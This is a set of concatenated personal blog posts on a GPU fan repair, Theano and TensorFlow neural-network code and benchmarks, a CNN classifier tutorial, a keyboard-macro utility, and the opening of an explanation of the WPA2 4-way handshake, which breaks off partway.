Upon further investigation, the base of the fan was found to be cracked. The crack can be seen in the photo that follows.

Okay. The crack was not quite as extensive originally. But, after several failed super-glue attempts, I decided to go for the hail-Mary. Unfortunately, my last ditch effort was likewise unsuccessful. Rather then spending more time and money on an epoxy-frankenstein cludge, I thought a replacement fan would make a substantially less dubious solution. I ordered a Delta 65mm 37mm BFB0712HF fan.

After several days on pins and needles, imagining all the things that might go wrong, the fan arrived. Quite unexpected (given my luck) it was a perfect fit; the fan was nearly, if not truly, identical to the original fan. The third fan screw is under one of the heat pads, by the way.

Now begins the tedious process of reassembling the GPU. In projects like this, I find it very helpful to stay organized. So, basically, **not** like this:

As an aside, one of the benefits of having your health reduced to shambles is that you have a lot of extra containers to organize screws. Life is chock-full of such silver linings.

Next I cleaned off the old thermal paste and took several scandalous photos of my new GPU.

For thermal paste I used Artic Silver 5. I started using that brand because other people use it. And those people probably did much the same. And so on, etc. Flawless logic. Except that Intel uses thermal paste produced by Dow Corning. Hmm.

All Done! Now for the nerve-wracking part. Images of my rig going up in smoke and taking the rest of the apartment with it flash before my eyes.

Anyway, it works. Cool.

Even better its averaging 35c under load and the fan is pretty quiet. Nice!

]]>

An easy way to get Theano working quickly is to first install Anaconda. Anaconda is packaged with Python, NumPy, and several other of the installation requirements bundled together in a convenient installer (see Figure 1). This guide recommends using Anaconda3-4.2.0 for 64-bit Windows for simultaneous compatibility with TensorFlow.

**Figure 1: Anaconda Python Installer**

An additional dependency that is required is a GCC toolchain. If the computer has an existing version of GCC or G++ installed, environment variables may need to be set to ensure Theano uses the appropriate tool chain. In Windows, environment variables can be viewed by typing *set* at the command prompt. System environment variables can be modified under *System* -> *Change Settings* -> *Advanced* -> *Environment Variables* (on Server 2012 R2). User environment variables are set under *User Accounts* -> *Change my environment variables*. If there are no conflicting GCC toolchains (mingw, mingw64, etc), the m2w64-toolchain can be installed by typing: *conda install m2w64-toolchain* at an Anaconda Command Prompt. This will make G++ in the Anaconda Prompt (a special command prompt including extra environment variables that is bundled with Anaconda).

**Figure 2: Setting System Environment Variables in Windows**

If the computer has an NVidia GPU with CUDA Compute Capability of 1.2 or greater, Theano can be configured to run on the GPU. NVidia’s website has a page that lists the Compute Capability for each of their supported cards. CUDA can be downloaded here. **Note**: CUDA recommends installing Visual Studio for full support. Visual Studio 2010 was used for this guide.

With the above dependencies installed, Theano can be installed by typing: *conda install theano pygpu* at an Anaconda Command Prompt. **Note**: At the time of writing this post, there is a memory leak issue in Theano 0.9.0 causing memory consumption to grow without bound. Version 0.8.2 does not have this issue and can be installed using *conda install theano=0.8.2*.

Similar to TensorFlow, most Theano functions create graph operations that are not immediately performed. This computation graph is later evaluated to perform the actual desired operations.

In this class, the MLP network is constructed using the typical matrix multiplication representation. The output of a layer is the matrix product of the input matrix with the weight matrix. A bias term is added to the output and then an activation function is applied element-wise on the result. For more details about the math behind MLP networks, see a past blog post. Code to setup the MLP class is as follows:

#Create an MLP: A sequence of fully-connected layers with an activation #function AF applied at all layers except the last. #X: The input tensor #W: A list of weight tensors for layers of the MLP #B: A list of bias tensors for the layers of the MLP #AF: The activation function to be used at hidden layers #Ret: The network output def CreateMLP(X, W, B, AF): n = len(W) for i in range(n - 1): X = AF(X.dot(W[i]) + B[i]) return X.dot(W[n - 1]) + B[n - 1] #Creates weight and bias matrices for an MLP network #given a list of the layer sizes. #L: A list of the layer sizes #Ret: The lists of weight and bias matrices (W, B) def CreateMLPWeights(L): W, B = [], [] n = len(L) for i in range(n - 1): #Use Xavier initialization for weights xv = np.sqrt(6. / (L[i] + L[i + 1])) W.append(theano.shared(np.random.uniform(-xv, xv, [L[i], L[i + 1]]))) #Initialize bias to 0 B.append(theano.shared(np.zeros([L[i + 1]]))) return (W, B) #Given a string of the activation function name, return the #corresponding Theano function. #Ret: The Theano activation function handle def GetActivationFunction(name): if name == 'tanh': return T.tanh elif name == 'sig': return T.nnet.sigmoid elif name == 'fsig': return T.nnet.ultra_fast_sigmoid elif name == 'relu': return T.nnet.relu elif name == 'softmax': return T.nnet.softmax class TheanoMLPR: def __init__(self, layers, actfn = 'tanh', batchSize = None, learnRate = 1e-3, maxIter = 1000, tol = 5e-2, verbose = True): self.AF = GetActivationFunction(actfn) #Batch size self.bs = batchSize self.L = layers self.lr = learnRate #Error tolerance for early stopping criteron self.tol = tol #Toggles verbose output self.verbose = verbose #Maximum number of iterations to run self.nIter = maxIter #List of weight matrices self.W = [] #List of bias matrices self.B = [] #Input matrix self.X = T.matrix() #Output matrix self.Y = T.matrix() #Weight and bias matrices self.W, self.B = CreateMLPWeights(layers) #The result of a forward pass of the network self.YH = CreateMLP(self.X, self.W, self.B, self.AF) #Use L2 loss for network self.loss = ((self.YH - self.Y) ** 2).mean() #Function for performing a forward pass self.ffp = theano.function([self.X], self.YH) #For computing the loss self.fcl = theano.function([self.X, self.Y], self.loss) #Gradients for weight matrices self.DW = [T.grad(self.loss, Wi) for Wi in self.W] #Gradients for bias self.DB = [T.grad(self.loss, Bi) for Bi in self.B] #Weight update terms WU = [(self.W[i], self.W[i] - self.lr * self.DW[i]) for i in range(len(self.DW))] BU = [(self.B[i], self.B[i] - self.lr * self.DB[i]) for i in range(len(self.DB))] #Gradient step self.fgs = theano.function([self.X, self.Y], updates = tuple(WU + BU))

As can be seen above, the network graph is created in the constructor for the TheanoMLPR class. Note that *self.X* and *self.Y* are placeholders for the input matrices, similar to TensorFlow. *theano.function* is used to create a function in the computation graph which is used to provide input and get output from the graph itself. For instance, *self.ffp = theano.function([self.X], self.YH)* creates a function that takes as input *self.X* and performs the necessary operations to get *self.YH* using *self.X* as input. *self.YH* is defined as the feedforward step (see *CreateMLP*), so *self.ffp* therefore performs the feedforward process in the MLP.

Fitting the network is done similar to the corresponding MLPR TensorFlow class. On each training iteration the gradients are computed for the network and then applied to the weight and bias matrices using *self.fgs*. Prediction and scoring are simple applications of the function defined in the constructor. The remaining code for the class is as follows:

#Initializes the weight and bias matrices of the network def Initialize(self): n = len(self.L) for i in range(n - 1): #Use Xavier initialization for weights xv = np.sqrt(6. / (self.L[i] + self.L[i + 1])) self.W[i].set_value(np.random.uniform(-xv, xv, [self.L[i], self.L[i + 1]])) #Initialize bias to 0 self.B[i].set_value(np.zeros([self.L[i + 1]])) #Fit the MLP to the data #A: numpy matrix where each row is a sample #Y: numpy matrix of target values def fit(self, A, Y): self.Initialize() m = len(A) for i in range(self.nIter): if self.bs is None: #Use all samples self.fgs(A, Y) #Perform the gradient step else: #Train m samples using random batches of size self.bs for _ in range(0, m, self.bs): #Choose a random batch of samples bi = np.random.randint(m, size = self.bs) self.fgs(A[bi], Y[bi]) #Perform the gradient step on the batch if i % 10 == 9: loss = self.score(A, Y) if self.verbose: print('Iter {:7d}: {:8f}'.format(1 + i, loss)) if loss < self.tol: break #Predict the output given the input (only run after calling fit) #A: The input values for which to predict outputs #Ret: The predicted output values (one row per input sample) def predict(self, A): return self.ffp(A) #Predicts the ouputs for input A and then computes the loss term #between the predicted and actual outputs #A: The input values for which to predict outputs #Y: The actual target values #Ret: The network loss term def score(self, A, Y): return np.float64(self.fcl(A, Y))

The complete code for the class is available here on GitHub.

Next, a benchmark is constructed to compare the performance of the TheanoMLPR class with that of the MLPR class from TFANN developed earlier. A data set comprised of random data is generated. Target values are taken to be the sum of the corresponding sample vectors squared. The sample matrix is then perturbed by values in [0, 1] and scaled again to the range [0, 1]. The sample and target matrices are written to a file so that both benchmarks can use identical data sets.

#Generate data with nf features and ns samples. If new data #is generated, write it to file so it can be reused across all benchmarks def GenerateData(nf = 256, ns = 16384): try: #Try to read data from file A = np.loadtxt('bdatA.csv', delimiter = ',') Y = np.loadtxt('bdatY.csv', delimiter = ',').reshape(-1, 1) except OSError: #New data needs to be generated x = np.linspace(-1, 1, num = ns).reshape(-1, 1) A = np.concatenate([x] * nf, axis = 1) Y = ((np.sum(A, axis = 1) / nf) ** 2).reshape(-1, 1) A = (A + np.random.rand(ns, nf)) / (2.0) np.savetxt('bdatA.csv', A, delimiter = ',') np.savetxt('bdatY.csv', Y, delimiter = ',') return (A, Y)

The benchmark compares the time taken for each model in training and testing. The amount of time to train and test each model is measured as the number of samples in the data set increases. The original data set is divided into *n* pieces and the training and testing times using the first *i* chunks are recorded.

#R: Regressor network to use #A: The sample data matrix #Y: Target data matrix #nt: Number of times to divide the sample matrix #fn: File name to write results def MakeBenchDataFeature(R, A, Y, nt, fn): #Divide samples into nt peices on for each i run benchmark with chunks 0, 1, ..., i step = A.shape[1] // nt TT = np.zeros((nt, 3)) for i in range(1, nt): #Number of features TT[i, 0] = len(range(0, (i * step))) print('{:8d} feature benchmark.'.format(int(TT[i, 0]))) #Training and testing times respectively TT[i, 1], TT[i, 2] = RunBenchmark(R, A[:, 0:(i * step)], Y[:, 0:(i * step)]) #Save benchmark data to csv file np.savetxt(fn, TT, delimiter = ',', header = 'Samples,Train,Test') #Plots benchmark data on a given matplotlib axes object #X: X-axis data #Y: Y-axis data #ax: The axes object #name: Name of plot for title #lab: Label of the data for the legend def PlotBenchmark(X, Y, ax, xlab, name, lab): ax.set_xlabel(xlab) ax.set_ylabel('Avg. Time (s)') ax.set_title(name + ' Benchmark') ax.plot(X, Y, linewidth = 1.618, label = lab) ax.legend(loc = 'upper left') #Runs a benchmark on a MLPR model #R: Regressor network to use #A: The sample data matrix #Y: Target data matrix def RunBenchmark(R, A, Y): #Record training times t0 = time.time() R.fit(A, Y) t1 = time.time() trnt = t1 - t0 #Record testing time t0 = time.time() YH = R.predict(A) t1 = time.time() tstt = t1 - t0 return (trnt, tstt)

To allow for a more fair comparison, the main program performs a single benchmark on each run. This is accomplished by passing a command-line argument to the program to indicate which benchmark to run: *tensorflow*, *theanogpu*, or *theano*. The command-line argument *plot* will display the generated benchmark data and plot it using MatPlotLib.

def Main(): if len(sys.argv) <= 1: return A, Y = GenerateData(ns = 2048) #Create layer sizes; make 6 layers of nf neurons followed by a single output neuron L = [A.shape[1]] * 6 + [1] print('Layer Sizes: ' + str(L)) if sys.argv[1] == 'theano': print('Running theano benchmark.') from TheanoANN import TheanoMLPR #Create the Theano MLP tmlp = TheanoMLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True) MakeBenchDataSample(tmlp, A, Y, 16, 'TheanoSampDat.csv') print('Done. Data written to TheanoSampDat.csv.') if sys.argv[1] == 'theanogpu': print('Running theano GPU benchmark.') #Set optional flags for the GPU #Environment flags need to be set before importing theano os.environ["THEANO_FLAGS"] = "device=gpu" from TheanoANN import TheanoMLPR #Create the Theano MLP tmlp = TheanoMLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True) MakeBenchDataSample(tmlp, A, Y, 16, 'TheanoGPUSampDat.csv') print('Done. Data written to TheanoGPUSampDat.csv.') if sys.argv[1] == 'tensorflow': print('Running tensorflow benchmark.') from TFANN import MLPR #Create the Tensorflow model mlpr = MLPR(L, batchSize = 128, learnRate = 1e-5, maxIter = 100, tol = 1e-3, verbose = True) MakeBenchDataSample(mlpr, A, Y, 16, 'TfSampDat.csv') print('Done. Data written to TfSampDat.csv.') if sys.argv[1] == 'plot': print('Displaying results.') try: T1 = np.loadtxt('TheanoSampDat.csv', delimiter = ',', skiprows = 1) except OSError: T1 = None try: T2 = np.loadtxt('TfSampDat.csv', delimiter = ',', skiprows = 1) except OSError: T2 = None try: T3 = np.loadtxt('TheanoGPUSampDat.csv', delimiter = ',', skiprows = 1) except OSError: T3 = None fig, ax = mpl.subplots(1, 2) if T1 is not None: PlotBenchmark(T1[:, 0], T1[:, 1], ax[0], '# Samples', 'Train', 'Theano') PlotBenchmark(T1[:, 0], T1[:, 2], ax[1], '# Samples', 'Test', 'Theano') if T2 is not None: PlotBenchmark(T2[:, 0], T2[:, 1], ax[0], '# Samples', 'Train', 'Tensorflow') PlotBenchmark(T2[:, 0], T2[:, 2], ax[1], '# Samples', 'Test', 'Tensorflow') if T3 is not None: PlotBenchmark(T3[:, 0], T3[:, 1], ax[0], '# Samples', 'Train', 'Theano GPU') PlotBenchmark(T3[:, 0], T3[:, 2], ax[1], '# Samples', 'Test', 'Theano GPU') mpl.show()

The completed code for the benchmark is available here on GitHub.

The above code was run on a Z800 workstation running Windows Server 2012 R2. The system has the following configuration:

- 2x Intel Xeon X5675 Costa Rica @ 3.06Ghz
- 96GB PC3-10600R 1333MHz RAM
- 4x 300GB 15000RPM SAS Drives in RAID 0
- 2x NVidia Quadro 5000 2.5GB

The system is pictured below in Figure 3.

**Figure 3: The Benchmark Rig**

The following commands can be used to generate the results and plots:

python Main.py theano python Main.py theanogpu python Main.py tensorflow python Main.py plot

**Note**: For GPU based Theano, both the *cl* compiler and *g++* must be in the *PATH* environment variable for the GPU to be used. This can be accomplished by running the *vcvarsall.bat* script that comes with Visual Studio inside an Anaconda prompt. The path to *vcvarsall.bat* may look similar to: *C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\vcvarsall.bat*. The plot generated by the program is shown below in Figure 4.

**Figure 4: TensorFlow vs. Theano Benchmark Results**

The above benchmark is constructed in an attempt to give a fair comparison between the two libraries, but it is by no means exhaustive. ANNs have numerous hyper-parameters and more benchmarks can be created to gain a better understanding of the performance trade-offs between TensorFlow and Theano. Due the CUDA Compute Capability of the Quadro 5000 being 2.0, the author is unable to benchmark GPU enabled TensorFlow.

The author is more than happy to include your benchmark results in this post if you share them below in a comment.

]]>

Past blog posts have explored multi-layer perceptron (MLP) networks. Recall from this post, that multi-layer perceptrons (MLPs) are fully-connected. Thus, in an MLP, a neuron in layer is connected to all neurons in layer . An example of an MLP network is shown below in Figure 1.

**Figure 1: A Multi-Layer Perceptron Network**

Fully-connected layers are reasonable for networks with relatively few neurons in each layer, but not so for networks having many neurons in each layer. For example, consider a network which is trained on image data. Images are typically stored as an matrix of pixel values, where the three matrices corresponds to the red, green, and blue channels respectively. If the first hidden layer of the network has neurons then the number of weights in the first weight matrix is .

The drawback of the above approach is twofold. First, having a large number of weights results in increased training times as the complexity of the matrix operations involved scales roughly cubically with the layer size (assuming layer sizes differ only by a constant size from each other). Second, the large number of parameters in the model make it prone to overfitting.

If the input data to the network is assumed to be images, some simplifications can be made. The key idea behind convolutional neural networks is that the pixels in images typically have a spatial relationship to each other; each pixel in an image is typically related to other pixels nearby it. For example, in an image of a brown cat, if a pixel is taken from the cat’s fur, it is likely that other nearby pixels are also brown. By making this assumption, the amount of weights in the network can be greatly reduced.

In addition to the fully-connected layer seen in MLPs, CNNs feature additional types of layers. Two common layers are discussed in this post: the convolutional layer and the pooling layer. Fully-connected layers in CNNs are identical to those seen in MLPs. Convolutional and pooling layers are discussed below in turn.

A key difference between MLPs and CNNs is that neurons in the convolutional and pooling layers of a CNN are logically arranged in 3 dimensions. Further, these layers are thought to take as input a 3D matrix of activations and produce a 3D matrix of activations. These 3 dimensions initially correspond to the 3 dimensions of the input image: height, width, and channel (red, green, or blue). Figure 2 below shows the way in which an image (the input to the first layer) is aranged as a 3D grid of activations.

**Figure 1: 3D Structure of Activations of Image Data**

Subsequent layers in the CNN transform the image into different 3D grids of neuron activations. Neurons receive input only from neurons in a small rectangular volume of the neurons in the previous layer. Though the height and width of the rectangular volume are parameters, neurons always receive input across all channels of the input volume. At fully-connected layers, the input is flattened into a row vector as with MLPs.

The convolutional layer utilizes the assumption that pixels are spatially related to each other by restricting the inputs to which each neuron is connected. A neuron receives input from neurons falling inside a rectangular field across all channels of the input volume. The activation of an individual neuron is the sum (over all channels) of the dot product of the weight matrix with the input matrices. By passing the rectangular filter over the input volume, a 2D matrix of activations is created. The distance between consecutive positions of the filter in a given dimension is a parameter known as the *stride*. Figure 3 below shows the difference between a stride of 1 (on the left) and 2 (on the right) in the width dimension.

**Figure 3: Effect of Different Stride Values**

The process of passing the filter over the input is repeated for times, where the parameter is the number of different filters that are used for the particular convolutional layer. The results of each of these iterations (each producing a 2D matrix) are concatenated to form a 3D matrix. Thus, each filter produces its own channel in the output volume.

Figure 4 below shows the way in which the output volume of neuron activations is computed. In the animation below, both the input and output volumes are of size , the filter size is of size , and the stride is 1 in all dimensions.

**Figure 4: Sliding Filter of a Convolutional Layer**

Note in the animation that when the filter extends beyond the bounds of the input volume, the out-of-bounds values are taken (typically) to be 0. This is known as padding. In practice, the input is typically padded with zeros so that the height and width of the input volume are preserved across a convolutional layer. Also, note that the height and width of the ouput volume are determined by the height and width of the input volume, the filter size, the amount of padding, and the stride values. The depth of the output volume, however, is an arbitrary parameter and is not affected by the depth of the input volume.

The second new type of layer is the pooling layer. Similar to convolutional layers, the cells in the output volume produced by pooling layers are computed by passing a rectangular window over the input volume. However, instead of computing dot products, only a single value in the window is selected. This is a form of downsampling. With max pooling, only the maximum value in the window is preserved and the remaining values are discarded. For example, if the filter was of size and contained the following values:

the max value of 0.654 would be preserved and the remaining 3 values would be discarded. This downsampling reduces the dimensionality of the problem without losing too much information. The main reason this loss of data is acceptable is that it was assumed that pixels are related to other nearby pixels. Note that there are no weights in a pooling layer; the pool function is simply applied to the output volume of the previous layer and the resulting volume is passed to the next layer.

After the data has been filtered and downsampled in some sequence of convolution and pooling layers it can be distilled into some output vector using one or more fully-connected layers. This is accomplished by flattening the output volume into a single row vector and applying the familiar steps of an MLP network.

The TFMLP file that was introduced in a past blog post is extended to support CNNs. Now that the module suports both MLPs and CNNs, it has been renamed to TFANN (short for TensorFlow Artificial Neural Networks). To promote code reuse, a base artificial neural network (ANN) class is created from which the MLP and CNN classes inherit. A simple class diagram showing the classes in the TFANN module is shown below in Figure 5.

**Figure 5: TFANN Class Diagram**

The ANN class provides functionality for maintaining a TensorFlow session and contains data members that are used in all ANN subclasses. The ANNC and ANNR subclasses correspond to neural networks that are used for classification and regression respectively. These subclasses provide functions that are used for fitting, scoring, and predicting with the neural network models, regardless of their actual architecture (CNN, MLP, etc). The leaf classes actual implement the specific neural network architecture by populating the TensorFlow graph with operations to perform the network’s functionalities. Note: The refactored MLPR and MLPC classes should work identically as those of past versions.

Of specific interest to this post is the CNNC class. The name CNNC is short for Convolutional Neural Network for Classification. The majority of the functionality for the class is indentical to that of the MLPC class. The major difference is in the *_CreateCNN* function.

#Sets up the graph for a convolutional neural network #from a list of specifications of the form: #[('C', [5, 5, 3, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]),('F', 10),] #Where 'C' denotes a covolution layer, 'P' denotes a pooling layer, and 'F' denotes #a fully-connected layer. def _CreateCNN(self, ws): self.W = [] self.B = [] YH = self.X for i, wsi in enumerate(ws): if wsi[0] == 'C': #Convolutional layer self.W.append(tf.Variable(tf.truncated_normal(wsi[1], stddev = 5e-2))) self.B.append(tf.Variable(tf.constant(0.0, shape = [wsi[1][-1]]))) YH = tf.nn.conv2d(YH, self.W[-1], wsi[2], padding = self.pad) YH = tf.nn.bias_add(YH, self.B[-1]) YH = self.AF(YH) #Apply the activation function to the output elif wsi[0] == 'P': #Pooling layer YH = tf.nn.max_pool(YH, ksize = wsi[1], strides = wsi[2], padding = self.pad) YH = tf.nn.lrn(YH, 4, bias=1.0, alpha = 0.001 / 9.0, beta = 0.75) elif wsi[0] == 'F': #Fully-connected layer #Flatten volume of previous layer for fully-connected layer yhs = YH.get_shape() lls = 1 for i in yhs[1:]: lls *= i.value YH = tf.reshape(YH, [-1, lls]) self.W.append(tf.Variable(tf.truncated_normal([lls, wsi[1]], stddev = 0.04))) self.B.append(tf.Variable(tf.constant(0.1, shape = [wsi[1]]))) YH = tf.matmul(YH, self.W[-1]) + self.B[-1] if i + 1 != len(ws): #Last layer shouldn't apply activation function YH = self.AF(YH) return YH

The above function creates the CNN based on a list of tuples which specify both the type of layer and parameters for the layer. In the above code, ‘C’ denotes a convolutional layer, ‘P’ denotes a pooling layer, and ‘F’ denotes a fully-connected layer.

For convolutional layers, the 2nd member of the tuple corresponds to the filter size and is of the form: [filterWidth, filterHeight, inChannels, outChannels]. The first three values determine the size of the rectangular solid (the receptive field) to which neurons are connected. The above discussion assumed that inChannels is equal to the full depth of the input volume. The final value determine the number of filters that are used (recall that this was arbitrary). The 3rd member of the tuple corresponds to the stride values for the filter for each of the 4 dimensions of the input data: [batchSize, height, width, channel]. Stride values determine the space between two filter positions as it passes over the input volume.

In the case of pooling layers, the 2nd member of the tuple corresponds to the filter size from which the max value is selected and is of the form: [batch, height, weidth, channel]. The 3rd member of the tuple corresponds to the stride value for each dimension and is of the form: [batch, height, weidth, channel]. The fully connected layers only require 1 parameter: the number of neurons in the layer.

With the above function and inheritance hierarchy, the actual implementation of the CNNC class is quite brief. As seen below, the sum of the softmax cross entropy is taken as the loss function along with optional L2 regularization.

#Convolutional Neural Network for Classification class CNNC(ANNC): #imageSize: Size of the images used (Height, Width, Depth) #ws: Weight matrix sizes def __init__(self, imageSize, ws, actvFn = 'relu', batchSize = None, learnRate = 1e-4, maxIter = 1000, optmzr = 'adam', pad = 'SAME', tol = 1e-1, reg = None, verbose = False): #Initialize fields from base class super().__init__(actvFn, batchSize, learnRate, maxIter, optmzr, reg, tol, verbose) #Input placeholder self.imgSize = list(imageSize) self.X = tf.placeholder("float", [None] + self.imgSize) #Padding method to use self.pad = pad #Target vector placeholder; final layer should be a fully connected layer self.Y = tf.placeholder("float", [None, ws[-1][1]]) #Create neural network graph and keep track of output variable self.YH = self._CreateCNN(ws) #Loss term self.loss = tf.reduce_sum(tf.nn.softmax_cross_entropy_with_logits(self.YH, self.Y)) #Use regularization to prevent over-fitting self.reg = reg if(reg is not None): self.loss += _CreateL2Reg(self.W, self.B) * reg self.optmzr = _GetOptimizer(optmzr, learnRate).minimize(self.loss) #Begin the TensorFlow Session self.RunSession()

Next, a brief example using the CNNC class is created using the CIFAR-10 dataset. The dataset is available here on Kaggle. CIFAR 10 is a classic data set used for object recognition that consists of 60,000 images divided into 10 classes (cat, dog, car, airplane, etc.). This example will train a CNN to classify an image as either containing a cat or a dog. The code that follows assumes the *train.7z* file has been extracted into a folder *train/* and the current directory contains the *trainLabels.csv* file.

First, the training labels file is scanned and only images from the classes cat or dog are retained. Then, 2048 random file names are selected from this number to form the training set. Next, the images are read into memory and the target vectors are formed. The target vectors are simple 2 component vectors that contain a single 1 and 0 determining if the target class is “cat” or “dog.” The images are read using the skimage library.

from TFMLP import CNNC import numpy as np import os import matplotlib.pyplot as mpl from skimage.io import imread from skimage import img_as_float from sklearn.model_selection import KFold from random import sample #The maximum number of images to use maxImg = 2048 #Path to directory with CIFAR-10 images p = 'train/' labs = [] fns = [] with open('trainLabels.csv') as rf: for line in rf: #Rows of CSV are like: index,label cnum, clab = line.strip().split(',') if clab == 'cat' or clab == 'dog': fns.append(cnum + '.png') labs.append(clab) #Take a random sample of the image indices si = sample(list(range(len(fns))), maxImg) #File names that were selected fs = [fns[sij] for sij in si] #Shape of the data matrix [maxImg x imageWidth x imageHeight x 3] A = np.zeros([maxImg] + list(imread(os.path.join(p, fns[0])).shape)) for i, fsi in enumerate(fs): #Fill in images converting from 0-255 to 0.0-1.0 A[i] = img_as_float(imread(os.path.join(p, fsi))) #Numpy array of labels Y = np.array([labs[sij] for sij in si])

Next, a CNNC object is created, fitted to the data, and used to predict labels for the training data. Finally, the first several images are displayed along with their predicted classes.

#Create the CNN ws = [('C', [5, 5, 3, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]), ('C', [5, 5, 64, 64], [1, 1, 1, 1]), ('P', [1, 3, 3, 1], [1, 2, 2, 1]), ('F', 64), ('F', 16), ('F', 2)] cnnr = CNNC(A[0].shape, ws, batchSize = 256, maxIter = 5, reg = 5e-2, tol = 7e-2, verbose = True) #Make a training/testing split kf = KFold() trn, tst = next(kf.split(A)) cnnr.fit(A[trn], Y[trn]) #Predict labels for all files YH = cnnr.predict(A) #Score the model using the accuracy rating s1 = cnnr.score(A, Y) s2 = cnnr.score(A[tst], Y[tst]) s3 = cnnr.score(A[trn], Y[trn]) print(str((s1, s2, s3))) #Plot the first m x n images in a grid with their predicted labels m = 6 n = 12 fig, ax = mpl.subplots(m, n) for i in range(m): for j in range(n): ax[i, j].imshow(A[i * n + j]) ax[i, j].set_title(YH[i * n + j]) mpl.show()

Of special note in the above code is the specification of the CNN layers in the variable *ws*. The first layer is a convolutional layer with filter size . Notice that the filter extends the full depth of the image. 64 filters are used in this layer resulting in an output volume with depth 64. The stride values in all dimensions are set as 1. This layer is followed by a max-pooling layer with a filter size of height 3 and width 3. The stride along width and depth is set to 2 with the stride along batch size and depth set to 1.

The next layer is a convolutional layer with a filter size of . 64 filters are used and the stride in all dimensions is again 1. This is followed by a pooling layer identical to the one above and then by 3 fully-connected layers. The final result is that images are distilled into 2-component row vectors representing the class scores. The CNNC class then converts these row vectors into labels using numpy.argmax and a dictionary.

Figure 6 below shows a sample run of the above code.

**Figure 6: CNN Classification Results**

Note that even with the reduced number of parameters that CNNs afford, training the network can take a substantial amount of time. This performance can be improved by running training on the GPU using the Cuda-enabled version of TensorFlow.

]]>

The data set is assumed to contain -dimensional sample vectors associated with -dimensional target vectors. As these vectors contain only 1s and 0s, the sample and target vectors can be considered as bit strings of length and respectively. These bit strings can then be thought of as unsigned integers. The following code converts a bit vector into its integer representation and back:

#Converts a binary vector (left to right format) to an integer #x: A binary vector #return: The corresponding integer def BinVecToInt(x): #Accumulator variable num = 0 #Place multiplier mult = 1 for i in x: #Cast is needed to prevent conversion to floating point num = num + int(i) * mult #Multiply by 2 mult <<= 1 return num #Converts an integer to a binary vector def IntToBinVec(x, v = None): #If no vector is passed create a new one if(v is None): dim = int(np.log2(x)) + 1 v = np.zeros([dim], dtype = np.int) #v will contain the binary vector c = 0 while(x > 0): #If the vector has been filled; return truncating the rest if c >= len(v): break #Test if the LSB is set if(x & 1 == 1): #Set the bits in right-to-left order v[c] = 1 #Onto the next column and bit c += 1 x >>= 1 return v

The above code works for arbitrary size binary vectors as Python’s built-in integer type can be of arbitrary size.

Now the -dimensional sample and -dimensional target vectors can be transformed into integers. Using the above code, the original data-set can be condensed into 2 dimensions and can be plotted on the standard Cartesian coordinate plane using MatPlotLib. In the above transformation, the x-axis corresponds to the sample vectors and the y-axis corresponds to the target vectors. The following code uses MatPlotLib to produce an animation showing the target data and the model’s prediction as successive training iterations pass.

#Plot the model R learning the data set A, Y #R: A regression model #A: The data samples #Y: The target vectors def PlotLearn(R, A, Y): intA = [BinVecToInt(j) for j in A] intY = [BinVecToInt(j) for j in Y] fig, ax = mpl.subplots(figsize=(20, 10)) ax.plot(intA, intY, label ='Orig') l, = ax.plot(intA, intY, label ='Pred') ax.legend(loc = 'upper left') #Updates the plot in ax as model learns data def UpdateF(i): R.fit(A, Y) YH = R.predict(A) S = MSE(Y, YH) intYH = [BinVecToInt(j) for j in YH] l.set_ydata(intYH) ax.set_title('Iteration: ' + str(i * 64) + ' - MSE: ' + str(S)) return l, ani = mpla.FuncAnimation(fig, UpdateF, frames = 2000, interval = 128, repeat = False) #ani.save('foo.mp4') #ffmpeg is required to save the animation to an mp4 mpl.show() return ani

In the above code, the nested function *UpdateF* is known as a closure. Since functions are first-class citizens in Python, they can be created as local-variables inside a function. This is useful in the above code as *UpdateF* can reference the MatPlotLib object in order to update the prediction data. Closures are a powerful if under-looked portion of Python that will be explored in a later topic.

Notice that the animation object is returned from the function. This is due to an issue in MatPlotLib resulting from garbage collection.

Next, a quarter cup of popcorn can be placed in an air-popper and popped, the lights can be dimmed, and the performance of the network can be visualized in real-time as the network is trained.

**Figure 1: Video of Neural Network Performance over Time**

In practice, the above code can be used to visualize the point at which performance has become satisfactory. If the animation window is closed, execution will begin after the call to *PlotLearn* and thus the model can then be used for subsequent prediction, or saved to a file, etc.

**Note:** Spikes in the prediction graph are due to the fact that the Hamming distance between two vectors and between two vectors can be small while the Euclidean distance in the above encoding can be arbitrarily large. For example, and only differ in only one bit position.

]]>

Expansion is accomplished using low-level Windows API calls so that resource utilization is kept low. *ShortX* is useful for launching program in Windows, for custom macros in games, and more. Program executables are available on the Software page.

To run the program simply double-click the exe file or run at the command prompt using:

shortx [flags]

where the available flags are as follows:

-c: Non-shortcut keystrokes are consumed.

-e: Expand macros using other macro definitions provided.

-h: Display help information.

-i: Specify path to the ini configuration file.

-s: Make ShortX start when the computer starts. If run as admin

this installs a registry key for all users (in HKEY_LOCAL_MACHINE).

-t: Amount of time to depress triggered keys. Note: key patterns

separated by a comma are triggered subsequently.

-u: Uninstall *ShortX* from the registry (stops *ShortX* from starting

at system start-up).

-v: Verbose mode. Display key names and codes to command window.

Please let me know what you think and if you have any requests, comments, or suggestions!

*N*

]]>

The first packet in the above trace is a *beacon frame* broadcast from the access point. Access points periodically transmit beacon frames to announce their presence to nearby devices. As seen in Figure 1 below, the destination address for the beacon frame is the broadcast address: FF:FF:FF:FF:FF:FF.

**Figure 1: Beacon Frame Destination MAC**

The beacon frame also contains the *SSID* field, which will be necessary in later steps. The SSID is the name of network. As can be seen in Figure 2 below, the SSID for the access point found in this packet capture is *Harkonen*.

**Figure 2: Beacon Frame SSID**

The next four packets of the capture comprise what is known as the WPA2 *4-way handshake*. This handshake is used to establish both the authenticity of the two endpoints and the encryption keys.

**Figure 3: 4-Way Handshake Sequence Diagram**

Figure 3 above shows a basic sequence diagram for the steps of the 4-way handshake. The following sections cover each step in detail.

In the first packet of the handshake, the access point sends a message to the station. A key part of this first step of the handshake is the 256-bit WPA Key Nonce (number used once) field, also known as the *ANonce*. The ANonce is a randomly generated number that will be used to establish the pairwise transient key (PTK). The PTK is used to encrypt later communciation between the access point and the station.

**Figure 4: ANonce Field**

Figure 4 above shows a capture with the WPA Key Nonce field of the first message highlighted.

